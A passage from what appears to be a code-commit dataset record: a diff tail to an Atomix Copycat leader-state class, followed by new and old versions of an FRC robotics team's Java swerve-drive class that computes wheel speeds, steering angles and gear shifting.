<ide><path>erver/src/main/java/io/atomix/copycat/server/state/LeaderState.java <ide> <ide> ComposableFuture<CommandResponse> future = new ComposableFuture<>(); <ide> sequenceCommand(request, session, future); <del> return future; <add> return future.thenApply(this::logResponse); <ide> } <ide> <ide> /** <ide> // If the request sequence number is more than 1k requests above the last sequenced request, reject the request. <ide> // The client should resubmit a request that fails with a COMMAND_ERROR. <ide> if (request.sequence() - session.getRequestSequence() > MAX_REQUEST_QUEUE_SIZE) { <del> future.complete(logResponse(CommandResponse.builder() <add> future.complete(CommandResponse.builder() <ide> .withStatus(Response.Status.ERROR) <ide> .withError(CopycatError.Type.COMMAND_ERROR) <del> .build())); <add> .build()); <ide> } <ide> // Register the request in the request queue if it's not too far ahead of the current sequence number. <ide> else { <ide> if (commitError == null) { <ide> applyCommand(index, future); <ide> } else { <del> future.complete(logResponse(CommandResponse.builder() <add> future.complete(CommandResponse.builder() <ide> .withStatus(Response.Status.ERROR) <ide> .withError(CopycatError.Type.INTERNAL_ERROR) <del> .build())); <add> .build()); <ide> } <ide> } <ide> });
Java
apache-2.0
4602fa36bed7c2f79e56d5baa701517459461ee3
0
Robolopes/RecycleRush,Robolopes/RecycleRush,Robolopes/RecycleRush,Robolopes/RecycleRush,Robolopes/RecycleRush
package org.usfirst.frc.team2339.Barracuda; /* * Add a swerve mode to RobotDrive * Code from Chief Delphi: http://www.chiefdelphi.com/forums/showthread.php?t=117099 */ import org.usfirst.frc.team2339.Barracuda.RobotMap.SwerveMap; //import com.sun.squawk.util.MathUtils; import java.lang.Math; import edu.wpi.first.wpilibj.DoubleSolenoid; import edu.wpi.first.wpilibj.Encoder; import edu.wpi.first.wpilibj.PIDController; import edu.wpi.first.wpilibj.PIDOutput; import edu.wpi.first.wpilibj.PIDSource; import edu.wpi.first.wpilibj.RobotDrive; import edu.wpi.first.wpilibj.SpeedController; import edu.wpi.first.wpilibj.Talon; import edu.wpi.first.wpilibj.smartdashboard.SmartDashboard; /** * * */ public class SwerveDrive extends RobotDrive { //declare the steering pods and shifter valve public static final int frontLeft = MotorType.kFrontLeft.value; public static final int frontRight = MotorType.kFrontRight.value; public static final int rearLeft = MotorType.kRearLeft.value; public static final int rearRight = MotorType.kRearRight.value; protected SpeedController speedControllers[] = new SpeedController[kMaxNumberOfMotors]; protected Pod wheelPods[] = new Pod[kMaxNumberOfMotors]; private DoubleSolenoid shift; public class WheelData { public double wheelSpeeds[] = new double[kMaxNumberOfMotors]; public double wheelAngles[] = new double[kMaxNumberOfMotors]; public WheelData() { // Initialize data for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 0; } } /** * Set speed and angle values when joystick in dead band */ public void setDeadBandValues() { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 45; } wheelAngles[frontRight] = -45; wheelAngles[rearLeft] = -45; } } public SwerveDrive() { super(SwerveMap.PWM.DRIVE_FRONT_LEFT, SwerveMap.PWM.DRIVE_REAR_LEFT, SwerveMap.PWM.DRIVE_FRONT_RIGHT, SwerveMap.PWM.DRIVE_REAR_RIGHT); speedControllers[frontLeft] = new Talon(SwerveMap.PWM.DRIVE_FRONT_LEFT_STEERING); speedControllers[frontRight] = new Talon(SwerveMap.PWM.DRIVE_FRONT_RIGHT_STEERING); speedControllers[rearLeft] = new Talon(SwerveMap.PWM.DRIVE_REAR_LEFT_STEERING); speedControllers[rearRight] = new Talon(SwerveMap.PWM.DRIVE_REAR_RIGHT_STEERING); //set up the steering pods with the correct sensors and controllers shift = new DoubleSolenoid(SwerveMap.Solenoid.DRIVE_SHIFT_HIGH, SwerveMap.Solenoid.DRIVE_SHIFT_LOW); wheelPods[frontLeft] = new Pod(m_frontLeftMotor, speedControllers[frontLeft], SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_B, 1); wheelPods[frontRight] = new Pod(m_frontRightMotor, speedControllers[frontRight], SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_B, 2); wheelPods[rearLeft] = new Pod(m_rearLeftMotor, speedControllers[rearLeft], SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_A, SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_B, 3); wheelPods[rearRight] = new Pod(m_rearRightMotor, speedControllers[rearRight], SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_B, 4); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * Most swerve code assumes the pivot point for rotation is the center of the wheels (i.e. center of rectangle with wheels as corners) * This calculation is generalized based on pivot being offset from rectangle center. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param xPivotOffset Amount pivot is offset sideways from center. (Positive toward right, negative toward left) * @param yPivotOffset Amount pivot is offset forward from center. (Positive toward front, negative toward back) * @return raw wheel speeds and angles */ public WheelData calculateRawWheelDataGeneral(double xVelocity, double yVelocity, double rotateVelocity, double xPivotOffset, double yPivotOffset) { WheelData rawWheelData = new WheelData(); double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH; double frontDist = L/2 - xPivotOffset; double rearDist = L/2 + xPivotOffset; double rightDist = W/2 - yPivotOffset; double leftDist = W/2 + yPivotOffset; // Find maximum wheel distance (radius) from center // Maximum radius is used to normalize rotational velocity so that wheels farthest from center move the fastest. double xMax = Math.max(rightDist, leftDist); double yMax = Math.max(frontDist, rearDist); double rMax = Math.hypot(xMax, yMax); double xDist = 0; double yDist = 0; double xWheel = 0; double yWheel = 0; xDist = rightDist; yDist = frontDist; xWheel = xVelocity + rotateVelocity * yDist / rMax; yWheel = yVelocity - rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[frontRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = frontDist; xWheel = xVelocity + rotateVelocity * yDist / rMax; yWheel = yVelocity + rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = rearDist; xWheel = xVelocity - rotateVelocity * yDist / rMax; yWheel = yVelocity + rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = rightDist; yDist = rearDist; xWheel = xVelocity - rotateVelocity * yDist / rMax; yWheel = yVelocity - rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[rearRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); normalize(rawWheelData.wheelSpeeds); return rawWheelData; } /** * NOTE: This should give same result as standard method below. * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @return raw wheel speeds and angles */ public WheelData calculateRawWheelData1(double xVelocity, double yVelocity, double rotateVelocity) { return calculateRawWheelDataGeneral(xVelocity, yVelocity, rotateVelocity, 0.0, 0.0); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @return raw wheel speeds and angles */ public WheelData calculateRawWheelData(double xVelocity, double yVelocity, double rotateVelocity) { WheelData rawWheelData = new WheelData(); //calculate angle/speed setpoints using wheel dimensions from SwerveMap double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH;; double R = Math.hypot(L, W); double A = xVelocity - rotateVelocity * (L / R); double B = xVelocity + rotateVelocity * (L / R); double C = yVelocity - rotateVelocity * (W / R); double D = yVelocity + rotateVelocity * (W / R); // Find wheel speeds rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(B, D); rawWheelData.wheelSpeeds[frontRight] = Math.hypot(B, C); rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(A, D); rawWheelData.wheelSpeeds[rearRight] = Math.hypot(A, C); normalize(rawWheelData.wheelSpeeds); // Find steering angles rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(B, D)); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(B, C)); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(A, D)); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(A, C)); return rawWheelData; } /** * Calculate wheel data change (delta) based on current data. * @param rawWheelData Raw wheel change data * @return wheel change data (delta) based on current wheel values */ public WheelData calculateDeltaWheelData(WheelData rawWheelData) { WheelData deltaWheelData = new WheelData(); for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { // Compute turn angle from encoder value (pidGet) and raw target value AngleFlip turnAngle = computeTurnAngle(wheelPods[iiWheel].pidGet(), rawWheelData.wheelAngles[iiWheel]); deltaWheelData.wheelAngles[iiWheel] = turnAngle.getAngle(); deltaWheelData.wheelSpeeds[iiWheel] = driveScale(turnAngle) * rawWheelData.wheelSpeeds[iiWheel]; } return deltaWheelData; } public void setPods(WheelData wheelData) { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelPods[iiWheel].setSteeringAngle(wheelData.wheelAngles[iiWheel]); wheelPods[iiWheel].setWheelSpeed(wheelData.wheelSpeeds[iiWheel]); } } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be relative to the current robot angle. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveRobot(double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { WheelData deltaWheelData = null; if (xVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || yVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || rotateVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND) { // Compute new values WheelData rawWheelData = calculateRawWheelData(xVelocity, yVelocity, rotateVelocity); deltaWheelData = calculateDeltaWheelData(rawWheelData); } else { // Joystick in dead band, set neutral values deltaWheelData = new WheelData(); deltaWheelData.setDeadBandValues(); } // Set shifter if(isLowGear){ shift.set(DoubleSolenoid.Value.kForward); } if(isHighGear){ shift.set(DoubleSolenoid.Value.kReverse); } // Set pods setPods(deltaWheelData); } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be absolute based on a fixed angle, e.g. the field. * @param robotAngle Angle (in degrees) of robot relative to fixed angle. This is probably taken from the gyro. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveAbsolute(double robotAngle, double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { double robotAngleRad = Math.toRadians(robotAngle); double xRobot = -xVelocity * Math.sin(robotAngleRad) + yVelocity * Math.cos(robotAngleRad); double yRobot = xVelocity * Math.cos(robotAngleRad) + yVelocity * Math.sin(robotAngleRad); this.swerveDriveRobot(xRobot, yRobot, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to itself */ public void swerveDriveTeleop() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); swerveDriveRobot(xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to a fixed angle using gyro */ public void swerveDriveTeleopGyro() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_FORWARD_BACK); yVelocity = -SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_SIDEWAYS); rotateVelocity = SwerveMap.Control.DRIVE_STICK.getRawAxis(SwerveMap.Control.DRIVE_AXIS_ROTATE); isLowGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_LOW); isHighGear = SwerveMap.Control.DRIVE_STICK.getRawButton(SwerveMap.Control.DRIVE_CONTROLLER_SHIFT_HIGH); double robotAngle = SwerveMap.Control.GYRO.getAngle(); swerveDriveAbsolute(robotAngle, xVelocity, yVelocity, rotateVelocity, isLowGear, isHighGear); } /** * Class to store angle and flip together * @author emiller * */ public class AngleFlip { private double angle; private boolean flip; public AngleFlip() { setAngle(0); setFlip(false); } public AngleFlip(double angle) { this.setAngle(angle); setFlip(false); } public AngleFlip(double angle, boolean flip) { this.setAngle(angle); flip = false; } /** * @return the angle */ public double getAngle() { return angle; } /** * @param angle the angle to set */ public void setAngle(double angle) { this.angle = angle; } /** * @return the flip */ public boolean isFlip() { return flip; } /** * @param flip the flip to set */ public void setFlip(boolean flip) { this.flip = flip; } }; /** * Normalizes an angle in degrees to (-180, 180]. * @param theta Angle to normalize * @return Normalized angle */ public double normalizeAngle(double theta) { while (theta > 180) { theta -= 360; } while (theta < -180) { theta += 360; } return theta; } /** * Compute angle needed to turn and whether or not flip is needed * @param currentAngle * @param targetAngle * @return new angle with flip */ public AngleFlip computeTurnAngle(double currentAngle, double targetAngle) { AngleFlip turnAngle = new AngleFlip(targetAngle - currentAngle, false); if (Math.abs(turnAngle.getAngle()) > 90) { turnAngle.setAngle(normalizeAngle(turnAngle.getAngle() + 180)); turnAngle.setFlip(true); } return turnAngle; } /** * Compute change angle to get from current to target angle. * @param currentAngle Current angle * @param targetAngle New angle to change to * @return change angle */ public double computeChangeAngle(double currentAngle, double targetAngle) { return computeTurnAngle(currentAngle, targetAngle).getAngle(); } /** * Scale drive speed based on how far wheel needs to turn * @param turnAngle Angle wheel needs to turn (with flip value) * @return speed scale factor in range [0, 1] */ public double driveScale(AngleFlip turnAngle) { double scale = 0; if (Math.abs(turnAngle.getAngle()) < 45) { /* * Eric comment: I don't like the discontinuous nature of this scaling. * Possible improvements: * 1) Use cosine(2 * turnAngle) * 2) Scale any angle < 90. */ scale = Math.cos(Math.toRadians(turnAngle.getAngle())); } else { scale = 0; } if (turnAngle.isFlip()) { scale = -scale; } return scale; } private class Pod implements PIDOutput, PIDSource { private Encoder steeringEnc; private SpeedController drive; private SpeedController steer; private PIDController pid; public Pod(SpeedController driveController, SpeedController steeringController, int steeringEncA, int steeringEncB, int podNumber) { steeringEnc = new Encoder(steeringEncA, steeringEncB); steeringEnc.setDistancePerPulse(SwerveMap.Constants.STEERING_ENC_PULSES_PER_REVOLUTION); drive = driveController; steer = steeringController; pid = new PIDController(SwerveMap.Constants.STEERING_PID_P, SwerveMap.Constants.STEERING_PID_I, SwerveMap.Constants.STEERING_PID_D, this, this); SmartDashboard.putData("Steering Pod " + podNumber, pid); pid.setInputRange(-180, 180); pid.setContinuous(true); pid.enable(); } public void pidWrite(double output) { steer.set(output); } public double pidGet() { return steeringEnc.getDistance(); } public void setSteeringAngle(double angle) { pid.setSetpoint(angle); } public void setWheelSpeed(double speed) { drive.set(speed); } } public void initDefaultCommand() { } }
2015RecycleRush/src/org/usfirst/frc/team2339/Barracuda/SwerveDrive.java
package org.usfirst.frc.team2339.Barracuda; /* * Add a swerve mode to RobotDrive * Code from Chief Delphi: http://www.chiefdelphi.com/forums/showthread.php?t=117099 */ import org.usfirst.frc.team2339.Barracuda.RobotMap.SwerveMap; //import com.sun.squawk.util.MathUtils; import java.lang.Math; import edu.wpi.first.wpilibj.DoubleSolenoid; import edu.wpi.first.wpilibj.Encoder; import edu.wpi.first.wpilibj.PIDController; import edu.wpi.first.wpilibj.PIDOutput; import edu.wpi.first.wpilibj.PIDSource; import edu.wpi.first.wpilibj.RobotDrive; import edu.wpi.first.wpilibj.SpeedController; import edu.wpi.first.wpilibj.Talon; import edu.wpi.first.wpilibj.smartdashboard.SmartDashboard; /** * * */ public class SwerveDrive extends RobotDrive { //declare the steering pods and shifter valve public static final int frontLeft = MotorType.kFrontLeft.value; public static final int frontRight = MotorType.kFrontRight.value; public static final int rearLeft = MotorType.kRearLeft.value; public static final int rearRight = MotorType.kRearRight.value; protected SpeedController speedControllers[] = new SpeedController[kMaxNumberOfMotors]; protected Pod wheelPods[] = new Pod[kMaxNumberOfMotors]; private DoubleSolenoid shift; public class WheelData { public double wheelSpeeds[] = new double[kMaxNumberOfMotors]; public double wheelAngles[] = new double[kMaxNumberOfMotors]; public WheelData() { // Initialize data for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 0; } } /** * Set speed and angle values when joystick in dead band */ public void setDeadBandValues() { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 45; } wheelAngles[frontRight] = -45; wheelAngles[rearLeft] = -45; } } public SwerveDrive() { super(SwerveMap.PWM.DRIVE_FRONT_LEFT, SwerveMap.PWM.DRIVE_REAR_LEFT, SwerveMap.PWM.DRIVE_FRONT_RIGHT, SwerveMap.PWM.DRIVE_REAR_RIGHT); speedControllers[frontLeft] = new Talon(SwerveMap.PWM.DRIVE_FRONT_LEFT_STEERING); speedControllers[frontRight] = new Talon(SwerveMap.PWM.DRIVE_FRONT_RIGHT_STEERING); speedControllers[rearLeft] = new Talon(SwerveMap.PWM.DRIVE_REAR_LEFT_STEERING); speedControllers[rearRight] = new Talon(SwerveMap.PWM.DRIVE_REAR_RIGHT_STEERING); //set up the steering pods with the correct sensors and controllers shift = new DoubleSolenoid(SwerveMap.Solenoid.DRIVE_SHIFT_HIGH, SwerveMap.Solenoid.DRIVE_SHIFT_LOW); wheelPods[frontLeft] = new Pod(m_frontLeftMotor, speedControllers[frontLeft], SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_B, 1); wheelPods[frontRight] = new Pod(m_frontRightMotor, speedControllers[frontRight], SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_B, 2); wheelPods[rearLeft] = new Pod(m_rearLeftMotor, speedControllers[rearLeft], SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_A, SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_B, 3); wheelPods[rearRight] = new Pod(m_rearRightMotor, speedControllers[rearRight], SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_B, 4); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * Most swerve code assumes the pivot point for rotation is the center of the wheels (i.e. center of rectangle with wheels as corners) * This calculation is generalized based on pivot being offset from rectangle center. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param xPivotOffset Amount pivot is offset sideways from center. (Positive toward right, negative toward left) * @param yPivotOffset Amount pivot is offset forward from center. (Positive toward front, negative toward back) * @return raw wheel speeds and angles */ public WheelData calculateRawWheelDataGeneral(double xVelocity, double yVelocity, double rotateVelocity, double xPivotOffset, double yPivotOffset) { WheelData rawWheelData = new WheelData(); double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH; double frontDist = L/2 - xPivotOffset; double rearDist = L/2 + xPivotOffset; double rightDist = W/2 - yPivotOffset; double leftDist = W/2 + yPivotOffset; double xDist = 0; double yDist = 0; double rWheel = 0; double xWheel = 0; double yWheel = 0; xDist = rightDist; yDist = frontDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity + rotateVelocity * yDist / rWheel; yWheel = yVelocity - rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[frontRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = frontDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity + rotateVelocity * yDist / rWheel; yWheel = yVelocity + rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = rearDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity - rotateVelocity * yDist / rWheel; yWheel = yVelocity + rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = rightDist; yDist = rearDist; rWheel = Math.hypot(xDist, yDist); xWheel = xVelocity - rotateVelocity * yDist / rWheel; yWheel = yVelocity - rotateVelocity * xDist / rWheel; rawWheelData.wheelSpeeds[rearRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); normalize(rawWheelData.wheelSpeeds); return rawWheelData; } /** * NOTE: This should give same result as standard method below. * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @return raw wheel speeds and angles */ public WheelData calculateRawWheelData1(double xVelocity, double yVelocity, double rotateVelocity) { return calculateRawWheelDataGeneral(xVelocity, yVelocity, rotateVelocity, 0.0, 0.0); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @return raw wheel speeds and angles */ public WheelData calculateRawWheelData(double xVelocity, double yVelocity, double rotateVelocity) { WheelData rawWheelData = new WheelData(); //calculate angle/speed setpoints using wheel dimensions from SwerveMap double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH;; double R = Math.hypot(L, W); double A = xVelocity - rotateVelocity * (L / R); double B = xVelocity + rotateVelocity * (L / R); double C = yVelocity - rotateVelocity * (W / R); double D = yVelocity + rotateVelocity * (W / R); // Find wheel speeds rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(B, D); rawWheelData.wheelSpeeds[frontRight] = Math.hypot(B, C); rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(A, D); rawWheelData.wheelSpeeds[rearRight] = Math.hypot(A, C); normalize(rawWheelData.wheelSpeeds); // Find steering angles rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(B, D)); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(B, C)); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(A, D)); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(A, C)); return rawWheelData; } /** * Calculate wheel data change (delta) based on current data. * @param rawWheelData Raw wheel change data * @return wheel change data (delta) based on current wheel values */ public WheelData calculateDeltaWheelData(WheelData rawWheelData) { WheelData deltaWheelData = new WheelData(); for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { // Compute turn angle from encoder value (pidGet) and raw target value AngleFlip turnAngle = computeTurnAngle(wheelPods[iiWheel].pidGet(), rawWheelData.wheelAngles[iiWheel]); deltaWheelData.wheelAngles[iiWheel] = turnAngle.getAngle(); deltaWheelData.wheelSpeeds[iiWheel] = driveScale(turnAngle) * rawWheelData.wheelSpeeds[iiWheel]; } return deltaWheelData; } public void setPods(WheelData wheelData) { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelPods[iiWheel].setSteeringAngle(wheelData.wheelAngles[iiWheel]); wheelPods[iiWheel].setWheelSpeed(wheelData.wheelSpeeds[iiWheel]); } } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be relative to the current robot angle. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveRobot(double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { WheelData deltaWheelData = null; if (xVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || yVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND || rotateVelocity > SwerveMap.Control.DRIVE_STICK_DEAD_BAND) { // Compute new values WheelData rawWheelData = calculateRawWheelData(xVelocity, yVelocity, rotateVelocity); deltaWheelData = calculateDeltaWheelData(rawWheelData); } else { // Joystick in dead band, set neutral values deltaWheelData = new WheelData(); deltaWheelData.setDeadBandValues(); } // Set shifter if(isLowGear){ shift.set(DoubleSolenoid.Value.kForward); } if(isHighGear){ shift.set(DoubleSolenoid.Value.kReverse); } // Set pods setPods(deltaWheelData); } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be absolute based on a fixed angle, e.g. the field. * @param robotAngle Angle (in degrees) of robot relative to fixed angle. This is probably taken from the gyro. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param isLowGear true if need to shift to low * @param isHighGear true if need to shift to high */ public void swerveDriveAbsolute(double robotAngle, double xVelocity, double yVelocity, double rotateVelocity, boolean isLowGear, boolean isHighGear) { double robotAngleRad = Math.toRadians(robotAngle); double xRobot = -xVelocity * Math.sin(robotAngleRad) + yVelocity * Math.cos(robotAngleRad); double yRobot = xVelocity * Math.cos(robotAngleRad) + yVelocity * Math.sin(robotAngleRad); this.swerveDriveRobot(xRobot, yRobot, rotateVelocity, isLowGear, isHighGear); } /** * Control robot relative to itself */ public void swerveDriveTeleop() { double xVelocity, yVelocity, rotateVelocity; boolean isLowGear, isHighGear; xVelocity = 